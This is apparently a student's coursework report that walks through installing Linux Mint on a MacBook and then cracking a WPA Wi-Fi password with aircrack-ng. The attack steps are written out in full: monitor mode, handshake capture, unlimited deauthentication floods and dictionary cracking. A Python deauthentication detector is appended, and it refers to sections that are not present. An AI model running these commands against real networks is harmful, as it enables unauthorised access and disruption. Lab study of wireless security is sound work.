If you are on a newer MacBook, you will need to plug in a wired keyboard (and mouse) in addition to a USB storage device. This is extremely important. For best results, I recommend you get a USB-C adapter with at least 2 USB ports so you have keyboard access and USB drive for installation.

Phase 1, preparing of the storage medium

In this phase, we will be making sure that there is a suitable place on our MacBook for us to install our distro. I will be using the built-in tool in macOS Mojave called Disk Utility.

First click on your main drive, for me, this is the “APPLE SSD SM0256” (Figure 1). If your view isn’t the same, you need to click on the “View” button and select “Show All Devices” (Figure 2). When the main drive is available to select, press partition (Figure 3).

Figure 1, Disk Utility View
Figure 2, View Menu Selection
Figure 3, Partition Icon

After you see a popup, you are going to press the plus button on the bottom left of the window (Figure 4). Here, I would be naming a 20GB partition “Mint” with the FAT file format. However, I already have a partition that I have installed Mint on, it was called “disk0s3”.

Note: the FAT file format is temporary and will be changed in the Mint installation.

Phase 2, preparing of the USB drive flash medium

For this phase, we will be requiring a USB drive which will have no data on it after flashing it for the Mint installation file, ISO.
We need two files: software which will let me flash an ISO file onto a USB drive, and a Mint operating system file, ISO.

Getting flashing program from: https://www.balena.io/etcher/
– Click download for macOS
– Wait for download

Getting the Mint installation file, ISO, from: https://linuxmint.com/download.php

Figure 4, Allocating Space for Partition

Scroll down until you see the available Mint versions. I recommend getting the Xfce as it is a very lightweight and fast desktop environment with essential programs preinstalled.

Download a torrent file and use a torrenter to get the file from seeds around you. I recommend this as it is the fastest way to get your ISO by far. Or you can scroll down and find a hosting site. Either way, you will have to wait for the download.

After, we launch the application, plug in our USB stick, select our downloaded ISO file, and click flash.

Figure 5, Etcher Flashing

When the process is completed, you will probably see a message box come up that the USB is not readable. This is OK, and it means it is ready for installation, here click ignore.

Figure 6, Unreadable Error

Phase 3, final checks for macOS before Mint installation

Before continuing, this is where you get a wired keyboard (and mouse) plugged in and test if they work correctly before moving on. Remember, wired is best since you will not have Bluetooth in BIOS/EFI menus.

In order to properly install without any issues, we need to perform checks to do with the readability of the hard drive, however, your mileage may vary due to this process differing from Mac to Mac. I have FileVault disabled to allow any and all access from any device to the machine. This might not be necessary for your attempt depending on your Mac, but to avoid absolutely any issues, this is recommended.

Figure 7, FileVault in System Preferences

Next check requires us to boot into recovery mode in our Mac.
To launch into recovery mode, simply hold ⌘+R when turning on your Mac. At this stage, if you aren’t on the latest version, or if you are launching into recovery mode for the first time, you will be asked to update the recovery mode utility; you will need to connect to a network and update. Recovery mode should look like Figure 8 (courtesy of MacBartender, source: https://www.macbartender.com/system-item-setup/).

Figure 8, Recovery Mode

Following this, select the Utilities menu option and click on “Boot Security Utility” as shown on Figure 9 (courtesy of Tech Otaku, source: https://www.tech-otaku.com/mac/secure-erasing-mac-fusiondrive/).

Figure 9, Boot Security Option

This is where it differs from Mac to Mac. I will be showing you what to do for the following MacBook models (source: https://support.apple.com/en-gb/HT208862):
– iMac Pro
– Mac mini models introduced in 2018
– MacBook Air models introduced in 2018
– MacBook Pro models introduced in 2018

These Mac computers have the Apple T2 Security Chip which gives them extra security on boot but makes it more difficult to install other operating systems. However, whatever your Mac is, to avoid all issues, select “No Security” in the Startup Security Utility, and “Allow booting from external media” under External Boot, as shown in Figure 10 (courtesy of Apple Support, source: https://support.apple.com/en-us/HT208330).

Figure 10, Startup Security Utility

After this, we are ready to move onto the next stage and boot from the USB.

Phase 4, booting from USB drive

To boot into our USB drive with Mint, completely turn off your Mac, just like switching it to recovery mode. However, this time, we will be pressing the alt/option key (left of the ⌘ key).
After successfully booting while pressing the alt/option key, we select the EFI boot.

Figure 11 (courtesy of natario, source: https://apple.stackexchange.com/q/188149) shows two additional boot options. In our case, both of them would be EFI Boot, unless you already have a Boot Camp Windows partition. This is okay, just do not press the Windows boot option. If you click the wrong option, shut down, and boot while pressing the alt/option key.

Figure 11, Boot Options

Please remember it is normal to have multiple EFI boot options available. If one doesn’t work, i.e. black screen, try the other.

Phase 5, installation of Mint

You will begin booting from the USB drive after you select the EFI boot option. This doesn’t mean installing Mint, however; that will come at a later point in time. Currently, we need to focus on selecting the option to Start Linux Mint when we are presented with the option as shown in Figure 12 (courtesy / source: http://linux-mac-windows.blogspot.com/2012/08/install-linux-mint-10-juliastep-by-step.html). Due to this being an old picture taken in 2012 when Mint was on version 10, this screen will look different on your version.

Figure 12, Mint Booting Options

Please refer back to this point in time when there are issues. You may want to try booting in compatibility mode if there are any issues booting in normal mode. What we are doing here is launching the operating system from the ISO onto the computer. However, we are not installing it; performing this launch will unpack the ISO and present us with a working version of Mint.

We are able to continue using the operating system like this, however, every restart, all data will be cleared, e.g. screenshots, downloaded programs, configured settings, etc. Therefore, we will start installing Mint on the partition we made instead of booting from the USB drive.

After a while of the Mac going over the ISO and preparing our desktop for use, we boot into the desktop environment.
Here is where we launch into problems if we are using a new Mac and your trackpad and keyboard aren’t supported (yet). Figure 13 (courtesy of Linux Mint, source: https://www.linuxmint.com/rel_sarah_xfce_whatsnew.php) is what you should be seeing.

Figure 13, Mint with Xfce

Now click on the installation icon on your desktop as shown in Figure 14.

Figure 14, Icon

Here we are now beginning the process of installation of the Linux distro Mint.

1. Go ahead and select your preferred language.
2. Press continue after reviewing your conditions.
3. Select “something else” (important)
4. Select your partition created in macOS

You will have multiple partitions available to edit. Select the partition we created earlier, delete it and make a new partition. You should be expecting to see something similar to Figure 15 (courtesy of itsfoss, source: https://i2.wp.com/itsfoss.com/wp-content/uploads/2013/12/Linux-MintInstallation-9.jpeg?ssl=1). Set it to Ext 4, Ext 3, or Ext 2. Set the size to whatever we have created before, and change the mount option to be “/” / root (important).

Figure 15, Mint Partition Selection

If you are having problems in this step, you can search for the program “gparted” in the start search box (this is preinstalled on Mint with Xfce). This is a program made in C++ which allows you to create, edit, delete partitions on your drives and also set mount options with various file formats, otherwise continue with the installation.

5. Click install now
6. Select the time zone you are in
7. Select your keyboard layout
8. Enter your details, i.e. username, password
9. Wait…

If you are told to return your USB drive, please do so, but do not remove all of the data off of it yet. It may be used later for some offline driver access when you want to connect to the internet.

You should now have Mint installed and booted into. If you do not, turn off your computer and press the alt/option key and boot into your newly created Mint install.
Before we start the aircrack process, we need to make sure we have Wi-Fi to properly install everything required. To get Wi-Fi set up, search for “Driver Manager”. When launched, you may be asked to plug in your USB drive to complete the driver update. After, you may have an option to select an alternative driver as shown in Figure 16 (courtesy of ghacks, source: https://www.ghacks.net/wpcontent/uploads/2015/03/driver-manager.jpg). You will then be able to connect to Wi-Fi.

Figure 16, Driver Selection

If there is no choice available for you, you will need to do research on your driver and what is necessary for it to function on a Linux distro.

Phase 6, upgrading dependencies, installing aircrack, enabling monitor mode

Before we start, let’s jump into root / admin mode in order to have access to everything (and so we don’t have to type sudo all the time) by performing the following command:

> sudo -i

Before we continue, I’d like to note that I like to direct myself to my documents folder in my home user folder. When we enter root, we go into the root folder, so we first need to back out with “../” and then continue into my home user folder with “home/bo/Documents”. This is where I will be saving my capture files, where I will be holding my dictionary, etc. In order to get into my documents folder, I perform the following command:

> cd ../home/bo/Documents

We begin by refreshing version repositories for our operating system. We do this by first performing the command:

> apt update

After updating our packages, from those packages we then install all programs, tools, utilities, etc. To do this, we need to perform the following command:

> apt upgrade

We then install aircrack-ng (which includes all of the tools we need to crack, monitor, etc.).
We do this by performing the following command:

> apt-get install aircrack-ng

To confirm we have aircrack, we can perform either of the following as they will both bring up the manual for the command.

> aircrack-ng

> aircrack-ng --help

Before starting, I will kill interfering processes with the following command.

> airmon-ng check kill

Command analysis
– airmon-ng check: Just performing this would list all interfering processes.
– airmon-ng check kill: Performing the full command will list and terminate all interfering processes.

In addition, we need to find out the network interface I will be performing the hack on. I will be performing the following command to list all of my network interfaces.

> ifconfig -a

Command analysis
– ifconfig: Lists active network interfaces available to the host.
– ifconfig -a: Lists all, active and inactive (up/down), network interfaces available to the host.

For me, I will be starting monitor mode with the airmon-ng command with the wlp3s0 interface. To do this, I will be performing the following command:

> airmon-ng start wlp3s0

Monitor mode is now available on prism0. This is still the same network interface, however we are now running in monitor mode that also has a different name.

Command analysis
– start [value]: The value will be the normal network interface you wish to enable monitor mode for.

Phase 7, checking surrounding networks

We can continue onto the next step where we list the surrounding networks from the data we intercept that is being sent to devices or is broadcasted. We can do this by performing the following command:

> airodump-ng prism0

Command analysis
– prism0: Value will be the network interface in monitor mode which will capture all network traffic.

Phase 8, intercepting network activity

We can now concentrate on one network, my network (Borys’s iPhone); we’ll wait for an authentication frame and then attempt to crack the password.
In order for us to start capturing information about a network and its devices, we perform the following command:

> airodump-ng -c 1 --bssid BA:F0:AB:48:25:A1 -w WPAcrack prism0 --ignore-negative-one

Command analysis
– -c [value]: Channel value, this can be found from the initial air dump capture. This is the channel the network is on.
– --bssid [value]: This is the MAC address of the access point you would like to intercept the network activity of.
– -w [value]: This is the file name in which all the capture information will be stored.
– prism0: This is the network interface (in monitor mode) that you will be using to capture the network traffic.
– --ignore-negative-one: Removes irrelevant error message.

Note: we are performing this command in the documents directory, so the WPAcrack file will appear there.

Terminal 1 minute after performing the command:

Terminal 3 minutes after performing the command:

We see that there was a WPA handshake captured (and is now in our capture file). Read phase 9 for if you do not have a WPA handshake captured.

Phase 9, Forcing a WPA handshake

Sometimes there is no one in the network that is requesting an authentication. However, that is what we are searching for when we want a WPA handshake. By sending a deauthentication request, we expect an authentication to happen.

In my situation I didn’t need to perform this step as I had already gotten a WPA handshake, but I will show you how to perform this step anyway; the evidence is from when I was attempting to obtain the password in another network by sending a deauthentication.

There are two ways you are able to send a deauthentication to the access point. First, is when you are sending the deauthentication as a broadcast frame.
This can be done by performing the following command.

> aireplay-ng --deauth 0 -a C0:05:C2:0D:5E:91 prism0 --ignore-negative-one

Command analysis
– --deauth [value]: The value will specify how many deauthentication requests you wish to send. Value 0 will be read as unlimited tries.
– -a [value]: This is the MAC address (/BSSID) of the access point you want to obtain the password from.
– prism0: This is the wireless network interface that has monitor mode enabled.
– --ignore-negative-one: Removes irrelevant error message.

Second, is when you specify what host is sending the deauthentication request. This kind of deauthentication request is more effective. This can be done by performing the following command.

> aireplay-ng --deauth 100 -a C0:05:C2:0D:5E:91 -c 64:1C:B0:E5:0C:7C prism0 --ignore-negative-one

Command analysis
– --deauth [value]: The value will specify how many deauthentication requests you wish to send. Value 0 will be read as unlimited tries.
– -a [value]: This is the MAC address (/BSSID) of the access point you want to obtain the password from.
– -c [value]: This is the MAC address of the client (/host) that is connected to the access point.
– prism0: This is the wireless network interface that has monitor mode enabled.
– --ignore-negative-one: Removes irrelevant error message.

Phase 10, brute force network using handshake frame

We will now use the WPA handshake we captured to compare against a dictionary of possible passwords.
We can do this with the following command:

> aircrack-ng -w passwords.txt -b BA:F0:AB:48:25:A1 WPAcrack-01.cap

Evidence of command:

Output of terminal:

Running this command has indeed cracked the password I have set for my access point (iPhone hotspot).

Command analysis
– -w [value]: Name (and directory) of the file which contains all the passwords aircrack-ng is going to compare against until it finds a match or until there is nothing left to compare in the file.
– -b [value]: MAC address of the access point you are going to find the WPA handshake of in order to compare other values with it.
– WPAcrack-01.cap: Capture of network traffic which contains the WPA handshake which is required to compare against other passwords in the frame.

In order for me to get the right password without leaving my device running trying to guess a password, I have created my own password file which contains a few possible passwords.

Conclusion

This element has been difficult as there was a lot of unknown and I have covered ground in a foreign operating system with tools I haven’t used before. I have spent a lot of time and effort trying to get the most complete documentation, especially with the last element which put my problem-solving skills to use.

In retrospect I would’ve liked to have known that I would be able to complete everything on the same machine but a different operating system, however, testing over and over again with different machines, operating systems, and tools, I believe has benefitted me a lot as I have experienced it a lot.

Moving on I believe I will be more cautious with passwords and Wi-Fi security now due to my new knowledge about this area and how difficult (/easy) it is to gain access to someone’s network. I also believe my understanding of Linux distros has increased, and now I know that they are more flexible than macOS and Windows with how fast you are able to “prototype” and experiment with different operating systems, e.g. trying them out, etc.

Evidence A

– Giving root access
– After apt update and apt upgrade
– Searching with airmon-ng
– Using airodump-ng to get handshake file
– Cracking the password with 3.38% progress
– Cracking the password with 43.06% progress
– All my capture attempts with my dictionary file

References

1. http://www.linfo.org/mac_address.html
2. https://www.zdnet.com/article/android-q-to-get-a-ton-of-new-privacy-features/
3. https://whatismyipaddress.com/ip-address
4. https://smallbiztrends.com/2014/02/pay-more-static-ip-address.html
5. https://en.wikipedia.org/wiki/Ifconfig
6. https://www.quora.com/What-is-the-purpose-of-a-local-loopback-interface-127-0-0-1
7. https://www.juniper.net/documentation/en_US/junos/topics/concept/interface-securityloopback-understanding.html
8. https://www.oreilly.com/library/view/linux-networkadministrators/1565924002/ch05s07.html
9. http://manpages.ubuntu.com/manpages/trusty/man8/ifconfig.8.html
10. http://man7.org/linux/man-pages/man7/netdevice.7.html
11. https://www.quora.com/What-is-my-inet-addr-Bcast-and-Mask-when-I-ifconfig-in-Linux
12. https://www.thegeekdiary.com/how-to-configure-multicast-on-an-ip-address-interface/
13. http://www.steves-internet-guide.com/introduction-multicasting/
14. https://askubuntu.com/questions/247625/what-is-the-loopback-device-and-how-do-i-use-it
15. http://www.microhowto.info/howto/change_the_mtu_of_a_network_interface.html
16. https://www.computerhope.com/jargon/n/netmask.htm
17. https://www.techopedia.com/definition/5376/netmask
18. https://www.quora.com/What-is-netmask
19. https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4813856/
20. https://www.cyberciti.biz/faq/what-is-a-routing-table/
21. https://serverfault.com/questions/832061/in-the-output-of-netstat-r-what-is-the-meaningof-the-netif-column-and-how-d
22. https://lists.freebsd.org/pipermail/freebsd-net/2008-March/017406.html
23. https://computing.llnl.gov/tutorials/performance_tools/man/netstat.txt
24. https://en.wikipedia.org/wiki/Routing_table
25. https://www.techopedia.com/definition/2184/default-gateway
26. https://mrncciew.com/2014/10/08/802-11-mgmt-beacon-frame/
27. https://www.intel.co.uk/content/www/uk/en/support/articles/000006508/network-and-io/wireless-networking.html
28. https://dalewifisec.wordpress.com/2014/04/29/wireshark-802-11-display-filters-2/
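The address roles worked through in A7.1, A8.1 and A16, and the deauthentication frames that appear in A9 and Phase 9, can be checked programmatically. The following is an added example, not part of the original report: a standard-library Python parser for the 24-byte 802.11 MAC header, plus a monitoring-side counter that flags bursts of deauthentication frames per BSSID. The frame bytes are constructed from the MAC addresses quoted in the report; the function names, the LAB_AP address, the timestamps, the window and the threshold are assumptions.

```python
import struct
from collections import defaultdict, deque

# Wireshark's wlan.fc.type_subtype is (type << 4) | subtype of the Frame Control field.
NAMES = {0x04: "probe-request", 0x05: "probe-response", 0x0A: "disassociation",
         0x0B: "authentication", 0x0C: "deauthentication", 0x20: "data"}


def mac(raw):
    """Format six raw bytes as a colon-separated MAC address."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame):
    """Decode a management or data frame header and name the role of each address."""
    if len(frame) < 24:
        raise ValueError("802.11 management/data header needs 24 bytes")
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    to_ds, from_ds = (fc >> 8) & 1, (fc >> 9) & 1
    if ftype == 1:
        raise ValueError("control frames use a shorter header")
    hdr = {"type_subtype": (ftype << 4) | subtype, "to_ds": to_ds, "from_ds": from_ds,
           "receiver": mac(a1), "transmitter": mac(a2)}
    if to_ds and from_ds:      # four-address frame: the source sits in Address 4
        if len(frame) < 30:
            raise ValueError("four-address frame is missing Address 4")
        hdr.update(bssid=None, destination=mac(a3), source=mac(frame[24:30]))
    elif to_ds:                # station -> AP: Address 1 is the BSSID
        hdr.update(bssid=mac(a1), source=mac(a2), destination=mac(a3))
    elif from_ds:              # AP -> station: Address 2 is the BSSID
        hdr.update(destination=mac(a1), bssid=mac(a2), source=mac(a3))
    else:                      # management frames: Address 3 is the BSSID
        hdr.update(destination=mac(a1), source=mac(a2), bssid=mac(a3))
    hdr["name"] = NAMES.get(hdr["type_subtype"], "other")
    return hdr


def deauth_bursts(capture, window=1.0, threshold=5):
    """Return {bssid: peak count} where >= threshold deauths fall inside `window` seconds."""
    recent, peaks = defaultdict(deque), {}
    for ts, frame in sorted(capture, key=lambda rec: rec[0]):
        try:
            hdr = parse_header(frame)
        except ValueError:     # truncated or control frame: nothing to count
            continue
        if hdr["name"] != "deauthentication":
            continue
        seen = recent[hdr["bssid"]]
        seen.append(ts)
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold:
            peaks[hdr["bssid"]] = max(peaks.get(hdr["bssid"], 0), len(seen))
    return peaks


def build(fc, a1, a2, a3):
    """Build a constructed 24-byte header (duration and sequence control zeroed)."""
    raw = [bytes.fromhex(m.replace(":", "")) for m in (a1, a2, a3)]
    return struct.pack("<HH6s6s6sH", fc, 0, *raw, 0)


# MAC addresses quoted in the report; every frame below is constructed from them.
AP, HOST, ROUTER = "00:16:b6:f7:1d:51", "00:13:02:d1:b6:4f", "00:16:b6:f4:eb:a8"
BCAST = "ff:ff:ff:ff:ff:ff"
LAB_AP = "02:00:00:00:00:01"   # assumed, locally administered test address

SYN = build(0x0108, AP, HOST, ROUTER)                    # data frame, ToDS = 1
SYNACK = build(0x0208, "91:2a:b0:49:b6:4f", AP, ROUTER)  # data frame, FromDS = 1
PROBE = build(0x0040, BCAST, "00:12:f0:1f:57:13", BCAST) # probe request (subtype 4)

CAPTURE = [(49.0, build(0x00C0, AP, HOST, AP)),          # one ordinary deauthentication
           (49.5, b"\xd4\x00" + bytes(8))]               # short control frame, skipped
CAPTURE += [(60.0 + i * 0.05, build(0x00C0, BCAST, LAB_AP, LAB_AP)) for i in range(8)]

if __name__ == "__main__":
    for label, frame in (("SYN", SYN), ("SYN, ACK", SYNACK), ("probe", PROBE)):
        h = parse_header(frame)
        print(label, h["name"], "bssid", h["bssid"], "src", h["source"], "dst", h["destination"])
    print("deauth bursts:", deauth_bursts(CAPTURE))
```

A single deauthentication stays below the threshold, so only the burst is reported. Counting frames only detects the activity; protected management frames (802.11w) are the control that makes forged deauthentication frames ineffective.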
